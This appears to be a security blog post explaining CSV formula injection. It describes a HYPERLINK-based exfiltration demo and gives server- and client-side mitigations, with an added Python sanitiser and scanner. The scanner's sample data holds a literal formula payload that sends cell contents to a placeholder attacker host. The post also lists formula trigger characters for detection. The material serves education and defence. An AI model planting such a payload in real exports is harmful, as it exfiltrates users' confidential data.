CSV Macro Injection

CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files.

CSV Injection is an attack technique that we encounter in day-to-day penetration testing of web applications.

Are you on the watch for malware within spreadsheet exports of your banking transactions? Or within a .CSV back-up of your contacts list?
A Formula Injection (or Spreadsheet Formula Injection) vulnerability affects applications that export spreadsheet files which are dynamically constructed from inadequately validated input data. Once injected, it affects the application end-users who open the exported spreadsheet files. Successful exploitation can lead to impacts such as client-side command injection, code execution or remote exfiltration of the confidential data the file contains.

CSV injection is a vulnerability that affects applications offering a spreadsheet export function. These spreadsheets are generated dynamically from unvalidated or unfiltered user input. Modern web applications commonly offer such an export, allowing the user to download data in .csv or .xls format for use in spreadsheet applications like MS Excel and OpenOffice Calc. As a result, the cells in the exported spreadsheet can contain input from an untrusted source, and the end user who opens the exported file can be affected.

An attacker can use this vulnerability to carry out attacks such as client-side command injection or code injection. The attack scenario purely targets the user(s) who download and open the exported file in the normal course of their work. The issue is often disregarded as a non-issue; however, websites should still be aware that the information they export can affect their users.

How does a simple CSV file pose a threat?

After downloading the CSV file, a user may choose to open it in spreadsheet software such as Microsoft Excel or LibreOffice. A malicious user could have submitted a formula (starting with =) that was included in the CSV file when the data was exported. This happens because the web application fails to properly sanitise the user input. When the file is opened in Excel or LibreOffice, the contents of the cell containing the formula may be executed.


Demonstration of CSV (Excel) macro injection:

Stealing information

In this case, let us see how the HYPERLINK function in LibreOffice can be leveraged by an attacker to exfiltrate sensitive data from the exported CSV file. The HYPERLINK function is used to insert an external link in the spreadsheet.

1. The attacker sets a malicious username (=HYPERLINK(malicious link)) in his profile. When the victim exports user-data.csv and opens it with LibreOffice, the attacker’s username is evaluated as a formula and is shown as a link. The malicious CSV file looks like this.
[Image b2.1]
2. The malicious CSV file looks like this in LibreOffice. As you can see in the highlighted part of the image, it says that there has been an error, which is just misleading text carrying an external malicious link.
[Image b2.2]
3. However unlikely, if the victim does click on the above link, this happens!
[Image b2.3]
In reality, the attacker would display, say, a ‘404 Not Found’ message on the web page. The highlighted URL shows the contents of other users’ rows being exfiltrated. (I have used localhost to demonstrate this. In reality, an attacker would be using one of his own domains.)
4. But how would the attacker get this data? Logs! Yes, the web server logs would clearly show the exfiltrated data.
[Image b2.4]
The above examples just demonstrate how it can be done. What can be done depends entirely on the attacker.
Remediation Strategy:
This attack is difficult to mitigate, and is explicitly excluded from quite a few bug bounty programs. To remediate it, ensure that no cells begin with any of the following characters:
- Equals ("=")
- Plus ("+")
- Minus ("-")
- At ("@")
Server-side Mitigation
Mitigation mechanisms range from adding a character such as a single tick (‘) or a space before cells starting with an equals character (=) to HTML-encoding special characters. However, care should be taken not to break the integrity of a legitimate user’s input. Several vendors were contacted about this vulnerability, and while some classified it as a high-risk issue, others did not perceive it to be a significant application security risk.
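The following is an added example, not code from the original post, showing what the server-side mitigation described above looks like in practice, together with a small scanner that flags formula-looking cells in a CSV export (the detection counterpart to the HYPERLINK demonstration earlier in the post). It assumes Python’s standard csv module; the hypothetical attacker.example URL and the sample rows are constructed for the demonstration. It goes slightly beyond the post’s list of four trigger characters by also treating a leading tab or carriage return as a trigger, since some spreadsheet importers strip those and interpret what follows, and it leaves plain signed numbers such as "-12.50" untouched so that legitimate data keeps its integrity.

```python
import csv
import io
import re

# Characters that make a spreadsheet treat a cell as a formula. "=", "+", "-"
# and "@" are the ones listed in the post; tab and carriage return are added
# here (an assumption beyond the post) because some importers strip them and
# then evaluate the remainder of the cell.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Plain signed numbers like "-12.50" are legitimate data, not formulas, so they
# are exempted from escaping to preserve input integrity.
_NUMERIC = re.compile(r"^[+-]?\d+(\.\d+)?$")


def is_dangerous_cell(value: str) -> bool:
    """Return True if a spreadsheet would interpret `value` as a formula."""
    if _NUMERIC.match(value):
        return False
    return value.startswith(FORMULA_TRIGGERS)


def sanitize_cell(value: str) -> str:
    """Neutralise a formula-looking cell by prefixing a single quote.

    Excel and LibreOffice treat a leading apostrophe as "text follows" and do
    not display it. Cells that are not dangerous are returned unchanged.
    """
    if is_dangerous_cell(value):
        return "'" + value
    return value


def export_csv(rows, sanitize=True) -> str:
    """Serialise rows to CSV text. With sanitize=True every cell is escaped.

    csv.QUOTE_ALL wraps each field in double quotes (embedded quotes are
    doubled), so a value cannot break out of its own field with a comma or a
    quote character.
    """
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        cells = [str(cell) for cell in row]
        if sanitize:
            cells = [sanitize_cell(c) for c in cells]
        writer.writerow(cells)
    return buf.getvalue()


def scan_csv(text: str):
    """Return (row, column, value) for every formula-looking cell in CSV text.

    Useful for auditing an export you produced, or a file you received, before
    anyone opens it in a spreadsheet.
    """
    findings = []
    for r, row in enumerate(csv.reader(io.StringIO(text))):
        for c, cell in enumerate(row):
            if is_dangerous_cell(cell):
                findings.append((r, c, cell))
    return findings


# Constructed sample: a user-profile export in which one username is a
# HYPERLINK payload of the kind described in the post (placeholder URL).
SAMPLE_ROWS = [
    ["username", "balance"],
    ["alice", "-12.50"],
    ['=HYPERLINK("http://attacker.example/?d="&A2&B2;"Error: click to retry")', "100"],
]

if __name__ == "__main__":
    raw = export_csv(SAMPLE_ROWS, sanitize=False)
    print("unsanitised export flags:", scan_csv(raw))
    safe = export_csv(SAMPLE_ROWS)
    print("sanitised export flags:", scan_csv(safe))
    print(safe)
```

The single-quote prefix is the mitigation the post describes; the QUOTE_ALL setting is what stops a crafted value from injecting extra fields or rows, which the prefix alone does not address. Run the scanner over existing exports to find rows that were stored before sanitisation was introduced.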
Client-side Mitigation
In the latest OpenOffice Calc and LibreOffice Calc versions, the DDE Formula’s command execution functionality was revoked after the initial discovery of a command injection vulnerability (CVE-2014-3524).
In Microsoft Excel, however, command injection is still possible; the only barrier is the security warnings, which are believed to be an adequate defence measure. They say the following:
Warning 1: “Do not enable this content unless you trust the source of this file”.
Warning 2: “Only click Yes if you trust the source of this workbook”.
Note that the warnings ask the user to enable content only if they trust the source, which in this case they have no reason not to.
Additionally, a reputable previous study [1] showed that up to 50% of users choose to disregard most security warnings, which makes these warnings an inadequate security safeguard. [1] http://scarybeastsecurity.blogspot.co.uk/2010_06_01_archive.html
It may also be interesting to know that the RFC for CSV (RFC 4180) states that “CSV files contain passive text data that should not pose any risks”, but also that “private data may be shared via this format (which of course applies to any text data)”. Formulae contained within .CSV files are nonetheless honoured by all major spreadsheet processors.
Conclusion
To conclude, Formula Injection can be mitigated on both the server and the client. However, if the client-side vendor finds the warnings sufficient and the server-side vendor cannot see any security implication, the result is a case of accepted risk with at least moderate likelihood. My endeavour has been to document this so as to improve awareness and reduce forced, unknowing exposure.



1 comment:

  1. Hi. Can you please let me know if we can perform command execution on a Linux environment like we do in Windows via macro injection.

    Thanks.
